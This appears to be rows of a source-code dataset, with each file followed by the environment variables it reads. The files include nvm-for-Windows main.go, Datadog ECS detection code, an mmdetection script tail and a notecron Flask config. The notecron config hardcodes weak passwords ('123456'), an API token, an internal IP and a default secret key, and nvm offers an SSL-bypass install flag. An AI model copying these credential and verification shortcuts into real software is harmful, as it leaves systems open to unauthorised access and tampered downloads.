parser.add_argument('--show', action='store_true', help='Show results.')
parser.add_argument(
'--show-dir', help='Directory where the output images will be saved.')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def main():
args = parse_args()
assert args.show or args.show_dir, ('Please specify at least one '
'operation (show the results / save )'
'the results with the argument '
'"--show" or "--show-dir".')
cfg = Config.fromfile(args.config)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# cfg.model.pretrained = None
distributed = False
# build the dataloader
dataset = build_dataset(cfg.data.test)
data_loader = build_dataloader(
dataset,
samples_per_gpu=1,
workers_per_gpu=cfg.data.workers_per_gpu,
dist=distributed,
shuffle=False)
# build the model and load checkpoint
cfg.model.train_cfg = None
model = build_detector(cfg.model, test_cfg=cfg.get('test_cfg'))
load_checkpoint(model, args.checkpoint, map_location='cpu')
model = MMDataParallel(model, device_ids=[0])
test(model, data_loader, args.show, args.show_dir)
if __name__ == '__main__':
main()
| []
| []
| [
"LOCAL_RANK"
]
| [] | ["LOCAL_RANK"] | python | 1 | 0 | |
src/nvm.go | package main
import (
"bytes"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"syscall"
"time"
"./nvm/web"
"./nvm/arch"
"./nvm/file"
"./nvm/node"
"github.com/olekukonko/tablewriter"
)
const (
NvmVersion = "1.1.8"
)
type Environment struct {
settings string
root string
symlink string
arch string
node_mirror string
npm_mirror string
proxy string
originalpath string
originalversion string
verifyssl bool
}
var home = filepath.Clean(os.Getenv("NVM_HOME")+"\\settings.txt")
var symlink = filepath.Clean(os.Getenv("NVM_SYMLINK"))
var env = &Environment{
settings: home,
root: "",
symlink: symlink,
arch: os.Getenv("PROCESSOR_ARCHITECTURE"),
node_mirror: "",
npm_mirror: "",
proxy: "none",
originalpath: "",
originalversion: "",
verifyssl: true,
}
func main() {
args := os.Args
detail := ""
procarch := arch.Validate(env.arch)
setup()
// Capture any additional arguments
if len(args) > 2 {
detail = args[2]
}
if len(args) > 3 {
if (args[3] == "32" || args[3] == "64") {
procarch = args[3]
}
}
if len(args) < 2 {
help()
return
}
// Run the appropriate method
switch args[1] {
case "install": install(detail,procarch)
case "uninstall": uninstall(detail)
case "use": use(detail,procarch)
case "list": list(detail)
case "ls": list(detail)
case "on": enable()
case "off": disable()
case "root":
if len(args) == 3 {
updateRootDir(args[2])
} else {
fmt.Println("\nCurrent Root: "+env.root)
}
case "version":
fmt.Println(NvmVersion)
case "v":
fmt.Println(NvmVersion)
case "arch":
if strings.Trim(detail," \r\n") != "" {
detail = strings.Trim(detail," \r\n")
if detail != "32" && detail != "64" {
fmt.Println("\""+detail+"\" is an invalid architecture. Use 32 or 64.")
return
}
env.arch = detail
saveSettings()
fmt.Println("Default architecture set to "+detail+"-bit.")
return
}
_, a := node.GetCurrentVersion()
fmt.Println("System Default: "+env.arch+"-bit.")
fmt.Println("Currently Configured: "+a+"-bit.")
case "proxy":
if detail == "" {
fmt.Println("Current proxy: "+env.proxy)
} else {
env.proxy = detail
saveSettings()
}
//case "update": update()
case "node_mirror": setNodeMirror(detail)
case "npm_mirror": setNpmMirror(detail)
default: help()
}
}
// ===============================================================
// BEGIN | CLI functions
// ===============================================================
func setNodeMirror(uri string) {
env.node_mirror = uri
saveSettings()
}
func setNpmMirror(uri string) {
env.npm_mirror = uri
saveSettings()
}
/*
func update() {
cmd := exec.Command("cmd", "/d", "echo", "testing")
var output bytes.Buffer
var _stderr bytes.Buffer
cmd.Stdout = &output
cmd.Stderr = &_stderr
perr := cmd.Run()
if perr != nil {
fmt.Println(fmt.Sprint(perr) + ": " + _stderr.String())
return
}
}
*/
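// install downloads the requested node.js version for the chosen architecture (resolving
// "latest" and bare major versions), then fetches and unpacks the matching npm release
// under the NVM root.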
func install(version string, cpuarch string) {
args := os.Args
lastarg := args[len(args) - 1]
if lastarg == "--insecure" {
env.verifyssl = false
}
if version == "" {
fmt.Println("\nInvalid version.")
fmt.Println(" ")
help()
return
}
cpuarch = strings.ToLower(cpuarch)
if cpuarch != "" {
if cpuarch != "32" && cpuarch != "64" && cpuarch != "all" {
fmt.Println("\""+cpuarch+"\" is not a valid CPU architecture. Must be 32 or 64.")
return
}
} else {
cpuarch = env.arch
}
if cpuarch != "all" {
cpuarch = arch.Validate(cpuarch)
}
// If user specifies "latest" version, find out what version is
if version == "latest" {
url := web.GetFullNodeUrl("latest/SHASUMS256.txt");
content := web.GetRemoteTextFile(url)
re := regexp.MustCompile("node-v(.+)+msi")
reg := regexp.MustCompile("node-v|-x.+")
version = reg.ReplaceAllString(re.FindString(content),"")
}
// if the user specifies only the major version number then install the latest
// version of the major version number
if len(version) == 1 {
version = findLatestSubVersion(version)
} else {
version = cleanVersion(version)
}
if checkVersionExceedsLatest(version) {
fmt.Println("Node.js v"+version+" is not yet released or available.")
return
}
if cpuarch == "64" && !web.IsNode64bitAvailable(version) {
fmt.Println("Node.js v"+version+" is only available in 32-bit.")
return
}
// Check to see if the version is already installed
if !node.IsVersionInstalled(env.root,version,cpuarch) {
if !node.IsVersionAvailable(version){
url := web.GetFullNodeUrl("index.json")
fmt.Println("\nVersion "+version+" is not available.\n\nThe complete list of available versions can be found at " + url)
return
}
// Make the output directories
os.Mkdir(filepath.Join(env.root, "v"+version), os.ModeDir)
os.Mkdir(filepath.Join(env.root, "v"+version, "node_modules"), os.ModeDir)
// Warn the user if they're attempting to install without verifying the remote SSL cert
if !env.verifyssl {
fmt.Println("\nWARNING: The remote SSL certificate will not be validated during the download process.\n")
}
// Download node
if (cpuarch == "32" || cpuarch == "all") && !node.IsVersionInstalled(env.root,version,"32") {
success := web.GetNodeJS(env.root,version,"32");
if !success {
os.RemoveAll(filepath.Join(env.root, "v"+version, "node_modules"))
fmt.Println("Could not download node.js v"+version+" 32-bit executable.")
return
}
}
if (cpuarch == "64" || cpuarch == "all") && !node.IsVersionInstalled(env.root,version,"64") {
success := web.GetNodeJS(env.root,version,"64");
if !success {
os.RemoveAll(filepath.Join(env.root, "v"+version, "node_modules"))
fmt.Println("Could not download node.js v"+version+" 64-bit executable.")
return
}
}
if file.Exists(filepath.Join(env.root, "v"+version, "node_modules", "npm")) {
return
}
// If successful, add npm
npmv := getNpmVersion(version)
success := web.GetNpm(env.root, getNpmVersion(version))
if success {
fmt.Printf("Installing npm v"+npmv+"...")
// new temp directory under the nvm root
tempDir := filepath.Join(env.root, "temp")
// Extract npm to the temp directory
err := file.Unzip(filepath.Join(tempDir, "npm-v"+npmv+".zip"), filepath.Join(tempDir, "nvm-npm"))
// Copy the npm and npm.cmd files to the installation directory
tempNpmBin := filepath.Join(tempDir, "nvm-npm", "cli-"+npmv, "bin")
// Support npm < 6.2.0
if file.Exists(tempNpmBin) == false {
tempNpmBin = filepath.Join(tempDir, "nvm-npm", "npm-"+npmv, "bin")
}
if file.Exists(tempNpmBin) == false {
log.Fatal("Failed to extract npm. Could not find " + tempNpmBin)
}
// Standard npm support
os.Rename(filepath.Join(tempNpmBin, "npm"), filepath.Join(env.root, "v"+version, "npm"))
os.Rename(filepath.Join(tempNpmBin, "npm.cmd"),filepath.Join(env.root, "v"+version, "npm.cmd"))
// npx support
if _, err := os.Stat(filepath.Join(tempNpmBin, "npx")); err == nil {
os.Rename(filepath.Join(tempNpmBin, "npx"), filepath.Join(env.root, "v"+version, "npx"))
os.Rename(filepath.Join(tempNpmBin, "npx.cmd"), filepath.Join(env.root, "v"+version, "npx.cmd"))
}
npmSourcePath := filepath.Join(tempDir, "nvm-npm", "npm-"+npmv)
if file.Exists(npmSourcePath) == false {
npmSourcePath = filepath.Join(tempDir, "nvm-npm", "cli-"+npmv)
}
moveNpmErr := os.Rename(npmSourcePath, filepath.Join(env.root, "v"+version, "node_modules", "npm"))
if moveNpmErr != nil {
// sometimes Windows can take some time to enable access to large amounts of files after unzip, use exponential backoff to wait until it is ready
for _, i := range [5]int{1, 2, 4, 8, 16} {
time.Sleep(time.Duration(i)*time.Second)
moveNpmErr = os.Rename(npmSourcePath, filepath.Join(env.root, "v"+version, "node_modules", "npm"))
if moveNpmErr == nil { break }
}
}
if err == nil && moveNpmErr == nil {
// Remove the temp directory
// may consider keep the temp files here
os.RemoveAll(tempDir)
fmt.Println("\n\nInstallation complete. If you want to use this version, type\n\nnvm use "+version)
} else if moveNpmErr != nil {
fmt.Println("Error: Unable to move directory "+npmSourcePath+" to node_modules: "+moveNpmErr.Error())
} else {
fmt.Println("Error: Unable to install NPM: "+err.Error());
}
} else {
fmt.Println("Could not download npm for node v"+version+".")
fmt.Println("Please visit https://github.com/npm/cli/releases/tag/v"+npmv+" to download npm.")
fmt.Println("It should be extracted to "+env.root+"\\v"+version)
}
// Reset the SSL verification
env.verifyssl = true
// If this is ever shipped for Mac, it should use homebrew.
// If this ever ships on Linux, it should be on bintray so it can use yum, apt-get, etc.
return
} else {
fmt.Println("Version "+version+" is already installed.")
return
}
}
func uninstall(version string) {
// Make sure a version is specified
if len(version) == 0 {
fmt.Println("Provide the version you want to uninstall.")
help()
return
}
version = cleanVersion(version)
// Determine if the version exists and skip if it doesn't
if node.IsVersionInstalled(env.root,version,"32") || node.IsVersionInstalled(env.root,version,"64") {
fmt.Printf("Uninstalling node v"+version+"...")
v, _ := node.GetCurrentVersion()
if v == version {
runElevated(fmt.Sprintf(`"%s" cmd /C rmdir "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink)))
}
e := os.RemoveAll(filepath.Join(env.root, "v"+version))
if e != nil {
fmt.Println("Error removing node v"+version)
fmt.Println("Manually remove " + filepath.Join(env.root, "v"+version) + ".")
} else {
fmt.Printf(" done")
}
} else {
fmt.Println("node v"+version+" is not installed. Type \"nvm list\" to see what is installed.")
}
return
}
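// findLatestSubVersion resolves a bare major version (e.g. "14") to the newest release in
// that line by parsing the latest-vN.x SHASUMS256.txt listing.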
func findLatestSubVersion(version string) string {
url := web.GetFullNodeUrl("latest-v" + version + ".x" + "/SHASUMS256.txt")
content := web.GetRemoteTextFile(url)
re := regexp.MustCompile("node-v(.+)+msi")
reg := regexp.MustCompile("node-v|-x.+")
latest := reg.ReplaceAllString(re.FindString(content), "")
return latest
}
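// use re-creates the NVM symlink to point at the requested version and swaps node.exe so
// the chosen 32- or 64-bit executable is active.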
func use(version string, cpuarch string) {
if version == "32" || version == "64" {
cpuarch = version
v, _ := node.GetCurrentVersion()
version = v
}
cpuarch = arch.Validate(cpuarch)
version = cleanVersion(version)
// Make sure the version is installed. If not, warn.
if !node.IsVersionInstalled(env.root,version,cpuarch) {
fmt.Println("node v"+version+" ("+cpuarch+"-bit) is not installed.")
if cpuarch == "32" {
if node.IsVersionInstalled(env.root,version,"64") {
fmt.Println("\nDid you mean node v"+version+" (64-bit)?\nIf so, type \"nvm use "+version+" 64\" to use it.")
}
}
if cpuarch == "64" {
if node.IsVersionInstalled(env.root,version,"32") {
fmt.Println("\nDid you mean node v"+version+" (32-bit)?\nIf so, type \"nvm use "+version+" 32\" to use it.")
}
}
return
}
// Remove symlink if it already exists
sym, _ := os.Stat(env.symlink)
if sym != nil {
if !runElevated(fmt.Sprintf(`"%s" cmd /C rmdir "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink))) {
return
}
}
// Create new symlink
if !runElevated(fmt.Sprintf(`"%s" cmd /C mklink /D "%s" "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink),
filepath.Join(env.root, "v"+version))) {
return
}
// Use the assigned CPU architecture
cpuarch = arch.Validate(cpuarch)
nodepath := filepath.Join(env.root, "v"+version, "node.exe")
node32path := filepath.Join(env.root, "v"+version, "node32.exe")
node64path := filepath.Join(env.root, "v"+version, "node64.exe")
node32exists := file.Exists(node32path)
node64exists := file.Exists(node64path)
nodeexists := file.Exists(nodepath)
if node32exists && cpuarch == "32" { // user wants 32, but node.exe is 64
if nodeexists {
os.Rename(nodepath, node64path) // node.exe -> node64.exe
}
os.Rename(node32path, nodepath) // node32.exe -> node.exe
}
if node64exists && cpuarch == "64" { // user wants 64, but node.exe is 32
if nodeexists {
os.Rename(nodepath, node32path) // node.exe -> node32.exe
}
os.Rename(node64path, nodepath) // node64.exe -> node.exe
}
fmt.Println("Now using node v"+version+" ("+cpuarch+"-bit)")
}
func useArchitecture(a string) {
if strings.ContainsAny("32",os.Getenv("PROCESSOR_ARCHITECTURE")) {
fmt.Println("This computer only supports 32-bit processing.")
return
}
if a == "32" || a == "64" {
env.arch = a
saveSettings()
fmt.Println("Set to "+a+"-bit mode")
} else {
fmt.Println("Cannot set architecture to "+a+". Must be 32 or 64 are acceptable values.")
}
}
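// list prints either the locally installed versions (marking the one currently in use)
// or a table of releases available for download, depending on listtype.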
func list(listtype string) {
if listtype == "" {
listtype = "installed"
}
if listtype != "installed" && listtype != "available" {
fmt.Println("\nInvalid list option.\n\nPlease use on of the following\n - nvm list\n - nvm list installed\n - nvm list available")
help()
return
}
if listtype == "installed" {
fmt.Println("")
inuse, a := node.GetCurrentVersion()
v := node.GetInstalled(env.root)
for i := 0; i < len(v); i++ {
version := v[i]
isnode, _ := regexp.MatchString("v",version)
str := ""
if isnode {
if "v"+inuse == version {
str = str+" * "
} else {
str = str+" "
}
str = str+regexp.MustCompile("v").ReplaceAllString(version,"")
if "v"+inuse == version {
str = str+" (Currently using "+a+"-bit executable)"
// str = ansi.Color(str,"green:black")
}
fmt.Printf(str+"\n")
}
}
if len(v) == 0 {
fmt.Println("No installations recognized.")
}
} else {
_, lts, current, stable, unstable, _ := node.GetAvailable()
releases := 20
data := make([][]string, releases, releases + 5)
for i := 0; i < releases; i++ {
release := make([]string, 4, 6)
release[0] = ""
release[1] = ""
release[2] = ""
release[3] = ""
if len(current) > i {
if len(current[i]) > 0 {
release[0] = current[i]
}
}
if len(lts) > i {
if len(lts[i]) > 0 {
release[1] = lts[i]
}
}
if len(stable) > i {
if len(stable[i]) > 0 {
release[2] = stable[i]
}
}
if len(unstable) > i {
if len(unstable[i]) > 0 {
release[3] = unstable[i]
}
}
data[i] = release
}
fmt.Println("")
table := tablewriter.NewWriter(os.Stdout)
table.SetHeader([]string{" Current ", " LTS ", " Old Stable ", "Old Unstable"})
table.SetBorders(tablewriter.Border{Left: true, Top: false, Right: true, Bottom: false})
table.SetAlignment(tablewriter.ALIGN_CENTER)
table.SetCenterSeparator("|")
table.AppendBulk(data) // Add Bulk Data
table.Render()
fmt.Println("\nThis is a partial list. For a complete list, visit https://nodejs.org/download/release")
}
}
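// enable re-enables version management by re-creating the symlink for the last installed
// version directory found under the nvm root (or prints a hint if none exist).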
func enable() {
dir := ""
files, _ := ioutil.ReadDir(env.root)
for _, f := range files {
if f.IsDir() {
isnode, _ := regexp.MatchString("v",f.Name())
if isnode {
dir = f.Name()
}
}
}
fmt.Println("nvm enabled")
if dir != "" {
use(strings.Trim(regexp.MustCompile("v").ReplaceAllString(dir,"")," \n\r"),env.arch)
} else {
fmt.Println("No versions of node.js found. Try installing the latest by typing nvm install latest")
}
}
func disable() {
if !runElevated(fmt.Sprintf(`"%s" cmd /C rmdir "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink))) {
return
}
fmt.Println("nvm disabled")
}
func help() {
fmt.Println("\nRunning version "+NvmVersion+".")
fmt.Println("\nUsage:")
fmt.Println(" ")
fmt.Println(" nvm arch : Show if node is running in 32 or 64 bit mode.")
fmt.Println(" nvm install <version> [arch] : The version can be a node.js version or \"latest\" for the latest stable version.")
fmt.Println(" Optionally specify whether to install the 32 or 64 bit version (defaults to system arch).")
fmt.Println(" Set [arch] to \"all\" to install 32 AND 64 bit versions.")
fmt.Println(" Add --insecure to the end of this command to bypass SSL validation of the remote download server.")
fmt.Println(" nvm list [available] : List the node.js installations. Type \"available\" at the end to see what can be installed. Aliased as ls.")
fmt.Println(" nvm on : Enable node.js version management.")
fmt.Println(" nvm off : Disable node.js version management.")
fmt.Println(" nvm proxy [url] : Set a proxy to use for downloads. Leave [url] blank to see the current proxy.")
fmt.Println(" Set [url] to \"none\" to remove the proxy.")
fmt.Println(" nvm node_mirror [url] : Set the node mirror. Defaults to https://nodejs.org/dist/. Leave [url] blank to use default url.")
fmt.Println(" nvm npm_mirror [url] : Set the npm mirror. Defaults to https://github.com/npm/cli/archive/. Leave [url] blank to default url.")
fmt.Println(" nvm uninstall <version> : The version must be a specific version.")
// fmt.Println(" nvm update : Automatically update nvm to the latest version.")
fmt.Println(" nvm use [version] [arch] : Switch to use the specified version. Optionally specify 32/64bit architecture.")
fmt.Println(" nvm use <arch> will continue using the selected version, but switch to 32/64 bit mode.")
fmt.Println(" nvm root [path] : Set the directory where nvm should store different versions of node.js.")
fmt.Println(" If <path> is not set, the current root will be displayed.")
fmt.Println(" nvm version : Displays the current running version of nvm for Windows. Aliased as v.")
fmt.Println(" ")
}
// ===============================================================
// END | CLI functions
// ===============================================================
// ===============================================================
// BEGIN | Utility functions
// ===============================================================
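// checkVersionExceedsLatest reports whether the requested version is newer than the
// latest release advertised by the configured node mirror.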
func checkVersionExceedsLatest(version string) bool{
//content := web.GetRemoteTextFile("http://nodejs.org/dist/latest/SHASUMS256.txt")
url := web.GetFullNodeUrl("latest/SHASUMS256.txt");
content := web.GetRemoteTextFile(url)
re := regexp.MustCompile("node-v(.+)+msi")
reg := regexp.MustCompile("node-v|-x.+")
latest := reg.ReplaceAllString(re.FindString(content),"")
var vArr = strings.Split(version,".")
var lArr = strings.Split(latest, ".")
for index := range lArr {
lat,_ := strconv.Atoi(lArr[index])
ver,_ := strconv.Atoi(vArr[index])
//Should check for valid input (checking for conversion errors) but this tool is made to trust the user
if ver < lat {
return false
} else if ver > lat {
return true
}
}
return false
}
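// cleanVersion normalizes user input to a full x.y.z version string, padding missing
// minor/patch components with zeros (e.g. "8" -> "8.0.0", "8.11" -> "8.11.0").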
func cleanVersion(version string) string {
re := regexp.MustCompile("\\d+.\\d+.\\d+")
matched := re.FindString(version)
if len(matched) == 0 {
re = regexp.MustCompile("\\d+.\\d+")
matched = re.FindString(version)
if len(matched) == 0 {
matched = version + ".0.0"
} else {
matched = matched + ".0"
}
fmt.Println(matched)
}
return matched
}
// Given a node.js version, returns the associated npm version
func getNpmVersion(nodeversion string) string {
_, _, _, _, _, npm := node.GetAvailable()
return npm[nodeversion]
}
func updateRootDir(path string) {
_, err := os.Stat(path)
if err != nil {
fmt.Println(path+" does not exist or could not be found.")
return
}
currentRoot := env.root
env.root = filepath.Clean(path)
// Copy command files
os.Link(filepath.Clean(currentRoot + "/elevate.cmd"), filepath.Clean(env.root + "/elevate.cmd"))
os.Link(filepath.Clean(currentRoot + "/elevate.vbs"), filepath.Clean(env.root + "/elevate.vbs"))
saveSettings()
if currentRoot != env.root {
fmt.Println("\nRoot has been changed from " + currentRoot + " to " + path)
}
}
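// runElevated runs a raw Windows command line (callers wrap it in elevate.cmd to gain
// administrator rights for symlink operations); it returns false and prints stderr on failure.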
func runElevated(command string) bool {
c := exec.Command("cmd") // dummy executable that actually needs to exist but we'll overwrite using .SysProcAttr
// Based on the official docs, syscall.SysProcAttr.CmdLine doesn't exist.
// But it does and is vital:
// https://github.com/golang/go/issues/15566#issuecomment-333274825
// https://medium.com/@felixge/killing-a-child-process-and-all-of-its-children-in-go-54079af94773
c.SysProcAttr = &syscall.SysProcAttr{CmdLine: command}
var stderr bytes.Buffer
c.Stderr = &stderr
err := c.Run()
if err != nil {
fmt.Println(fmt.Sprint(err) + ": " + stderr.String())
return false
}
return true
}
func saveSettings() {
content := "root: " + strings.Trim(env.root, " \n\r") + "\r\narch: " + strings.Trim(env.arch, " \n\r") + "\r\nproxy: " + strings.Trim(env.proxy, " \n\r") + "\r\noriginalpath: " + strings.Trim(env.originalpath, " \n\r") + "\r\noriginalversion: " + strings.Trim(env.originalversion, " \n\r")
content = content + "\r\nnode_mirror: " + strings.Trim(env.node_mirror, " \n\r") + "\r\nnpm_mirror: " + strings.Trim(env.npm_mirror, " \n\r")
ioutil.WriteFile(env.settings, []byte(content), 0644)
}
// NOT USED?
/*
func useArchitecture(a string) {
if strings.ContainsAny("32",os.Getenv("PROCESSOR_ARCHITECTURE")) {
fmt.Println("This computer only supports 32-bit processing.")
return
}
if a == "32" || a == "64" {
env.arch = a
saveSettings()
fmt.Println("Set to "+a+"-bit mode")
} else {
fmt.Println("Cannot set architecture to "+a+". Must be 32 or 64 are acceptable values.")
}
}
*/
// ===============================================================
// END | Utility functions
// ===============================================================
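// setup reads the settings file referenced by env.settings and populates the root,
// architecture, mirror and proxy configuration used by the other commands.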
func setup() {
lines, err := file.ReadLines(env.settings)
if err != nil {
fmt.Println("\nERROR",err)
os.Exit(1)
}
// Process each line and extract the value
for _, line := range lines {
line = strings.Trim(line, " \r\n")
if strings.HasPrefix(line, "root:") {
env.root = filepath.Clean(strings.TrimSpace(regexp.MustCompile("^root:").ReplaceAllString(line, "")))
} else if strings.HasPrefix(line, "originalpath:") {
env.originalpath = filepath.Clean(strings.TrimSpace(regexp.MustCompile("^originalpath:").ReplaceAllString(line, "")))
} else if strings.HasPrefix(line, "originalversion:") {
env.originalversion = strings.TrimSpace(regexp.MustCompile("^originalversion:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "arch:") {
env.arch = strings.TrimSpace(regexp.MustCompile("^arch:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "node_mirror:") {
env.node_mirror = strings.TrimSpace(regexp.MustCompile("^node_mirror:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "npm_mirror:") {
env.npm_mirror = strings.TrimSpace(regexp.MustCompile("^npm_mirror:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "proxy:") {
env.proxy = strings.TrimSpace(regexp.MustCompile("^proxy:").ReplaceAllString(line, ""))
if env.proxy != "none" && env.proxy != "" {
if strings.ToLower(env.proxy[0:4]) != "http" {
env.proxy = "http://"+env.proxy
}
web.SetProxy(env.proxy, env.verifyssl)
}
}
}
web.SetMirrors(env.node_mirror, env.npm_mirror)
env.arch = arch.Validate(env.arch)
// Make sure the directories exist
_, e := os.Stat(env.root)
if e != nil {
fmt.Println(env.root+" could not be found or does not exist. Exiting.")
return
}
}
| [
"\"NVM_HOME\"",
"\"NVM_SYMLINK\"",
"\"PROCESSOR_ARCHITECTURE\"",
"\"PROCESSOR_ARCHITECTURE\"",
"\"PROCESSOR_ARCHITECTURE\""
]
| []
| [
"NVM_SYMLINK",
"NVM_HOME",
"PROCESSOR_ARCHITECTURE"
]
| [] | ["NVM_SYMLINK", "NVM_HOME", "PROCESSOR_ARCHITECTURE"] | go | 3 | 0 | |
pkg/util/ecs/detection.go | // Unless explicitly stated otherwise all files in this repository are licensed
// under the Apache License Version 2.0.
// This product includes software developed at Datadog (https://www.datadoghq.com/).
// Copyright 2016-2020 Datadog, Inc.
// +build docker
package ecs
import (
"os"
"time"
"github.com/DataDog/datadog-agent/pkg/util/cache"
ecsmeta "github.com/DataDog/datadog-agent/pkg/util/ecs/metadata"
"github.com/DataDog/datadog-agent/pkg/util/log"
)
const (
isFargateInstanceCacheKey = "IsFargateInstanceCacheKey"
hasFargateResourceTagsCacheKey = "HasFargateResourceTagsCacheKey"
hasEC2ResourceTagsCacheKey = "HasEC2ResourceTagsCacheKey"
// CloudProviderName contains the inventory name for ECS
CloudProviderName = "AWS"
)
// IsECSInstance returns whether the agent is running in ECS.
func IsECSInstance() bool {
_, err := ecsmeta.V1()
return err == nil
}
// IsFargateInstance returns whether the agent is in an ECS fargate task.
// It detects it by getting and unmarshalling the metadata API response.
func IsFargateInstance() bool {
return queryCacheBool(isFargateInstanceCacheKey, func() (bool, time.Duration) {
// This envvar is set to AWS_ECS_EC2 on classic EC2 instances
// Versions 1.0.0 to 1.3.0 (latest at the time) of the Fargate
// platform set this envvar.
// If Fargate detection were to fail, running a container with
// `env` as cmd will allow to check if it is still present.
if os.Getenv("AWS_EXECUTION_ENV") != "AWS_ECS_FARGATE" {
return newBoolEntry(false)
}
_, err := ecsmeta.V2().GetTask()
if err != nil {
log.Debug(err)
return newBoolEntry(false)
}
return newBoolEntry(true)
})
}
// IsRunningOn returns true if the agent is running on ECS/Fargate
func IsRunningOn() bool {
return IsECSInstance() || IsFargateInstance()
}
// HasEC2ResourceTags returns whether the metadata endpoint in ECS exposes
// resource tags.
func HasEC2ResourceTags() bool {
return queryCacheBool(hasEC2ResourceTagsCacheKey, func() (bool, time.Duration) {
client, err := ecsmeta.V3FromCurrentTask()
if err != nil {
return newBoolEntry(false)
}
_, err = client.GetTaskWithTags()
return newBoolEntry(err == nil)
})
}
// HasFargateResourceTags returns whether the metadata endpoint in Fargate
// exposes resource tags.
func HasFargateResourceTags() bool {
return queryCacheBool(hasFargateResourceTagsCacheKey, func() (bool, time.Duration) {
_, err := ecsmeta.V2().GetTaskWithTags()
return newBoolEntry(err == nil)
})
}
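// queryCacheBool returns the cached boolean stored under cacheKey; on a miss (or an
// entry of the wrong type) it evaluates cacheMissEvalFunc and caches the result with
// the returned TTL.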
func queryCacheBool(cacheKey string, cacheMissEvalFunc func() (bool, time.Duration)) bool {
if cachedValue, found := cache.Cache.Get(cacheKey); found {
if v, ok := cachedValue.(bool); ok {
return v
}
log.Errorf("Invalid cache format for key %q: forcing a cache miss", cacheKey)
}
newValue, ttl := cacheMissEvalFunc()
cache.Cache.Set(cacheKey, newValue, ttl)
return newValue
}
func newBoolEntry(v bool) (bool, time.Duration) {
if v {
return v, 5 * time.Minute
}
return v, cache.NoExpiration
}
| [
"\"AWS_EXECUTION_ENV\""
]
| []
| [
"AWS_EXECUTION_ENV"
]
| [] | ["AWS_EXECUTION_ENV"] | go | 1 | 0 | |
notecron/center/config.py | import os
from apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore
from notedata.work import WorkApp
app = WorkApp('notecron')
app.create()
basedir = app.dir_common # os.path.abspath(os.path.dirname(__file__))
#redis_host = '192.168.3.122'
login_password = '123456'
logs_path = app.dir_log
cron_db_url = 'sqlite:///'+app.db_file('cron.sqlite')
#cron_db_url = 'sqlite:////root/workspace/notechats/notecron/notecron/temp/cron.sqlite'
#cron_db_url = 'sqlite:///'+os.path.abspath(os.path.dirname(__file__))+'/cron.sqlite'
cron_job_log_db_url = 'sqlite:///'+app.db_file('db.sqlite')
#cron_job_log_db_url = 'sqlite:////root/workspace/notechats/notecron/notecron/temp/db.sqlite'
#cron_job_log_db_url = 'sqlite:///'+os.path.abspath(os.path.dirname(__file__))+'/db.sqlite'
def get_config():
data = {
'is_single': 0,
'redis_host': '192.168.3.122',
'redis_pwd': '123456',
'redis_db': 1,
'cron_db_url': cron_db_url,
'cron_job_log_db_url': cron_job_log_db_url,
'redis_port': 6379,
'login_pwd': login_password,
'error_notice_api_key': 123456,
'job_log_counts': 1000,
'api_access_token': 'abcdedf',
'error_keyword': 'fail'
}
return data
def get_config_value(key):
data = {
'is_single': 0,
'redis_host': '192.168.3.122',
'redis_pwd': '123456',
'redis_db': 1,
'cron_db_url': cron_db_url,
'cron_job_log_db_url': cron_job_log_db_url,
'redis_port': 6379,
'login_pwd': login_password,
'error_notice_api_key': 123456,
'job_log_counts': 1000,
'api_access_token': 'abcdedf',
'error_keyword': 'fail'
}
return data[key]
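# Flask / Flask-APScheduler configuration shared by every environment; the JOBS list
# registers the built-in maintenance jobs (cron_check, cron_del_job_log, cron_check_db_sleep).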
class Config:
JSON_AS_ASCII = False
JSONIFY_PRETTYPRINT_REGULAR = False
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
SQLALCHEMY_COMMIT_ON_TEARDOWN = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
SCHEDULER_API_ENABLED = False
CRON_DB_URL = cron_db_url
LOGIN_PWD = login_password
BASEDIR = basedir
LOGDIR = logs_path
SCHEDULER_JOBSTORES = {
'default': SQLAlchemyJobStore(url=cron_db_url)
}
SCHEDULER_EXECUTORS = {
'default': {
'type': 'threadpool',
'max_workers': 30
}
}
# 'misfire_grace_time':30
SCHEDULER_JOB_DEFAULTS = {
'coalesce': False,
'max_instances': 20,
'misfire_grace_time': 50
}
JOBS = [
{
'id': 'cron_check',
'func': 'notecron.center.pages.crons:cron_check',
'args': None,
'replace_existing': True,
'trigger': 'cron',
'day_of_week': "*",
'day': '*',
'hour': '*',
'minute': '*/30'
},
{
'id': 'cron_del_job_log',
'func': 'notecron.center.pages.crons:cron_del_job_log',
'args': None,
'replace_existing': True,
'trigger': 'cron',
'day_of_week': "*",
'day': '*',
'hour': '*/8'
},
{
'id': 'cron_check_db_sleep',
'func': 'notecron.center.pages.crons:cron_check_db_sleep',
'args': None,
'replace_existing': True,
'trigger': 'cron',
'day_of_week': "*",
'day': '*',
'hour': '*',
'minute': '*/10',
}
]
@staticmethod
def init_app(app):
if not os.path.exists(logs_path):
os.mkdir(logs_path)
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = cron_job_log_db_url
class ProductionConfig(Config):
DEBUG = False
SQLALCHEMY_DATABASE_URI = cron_job_log_db_url
config = {
'development': DevelopmentConfig,
'testing': DevelopmentConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
config_dict = {
'development': DevelopmentConfig,
'testing': DevelopmentConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
| []
| []
| [
"SECRET_KEY"
]
| [] | ["SECRET_KEY"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
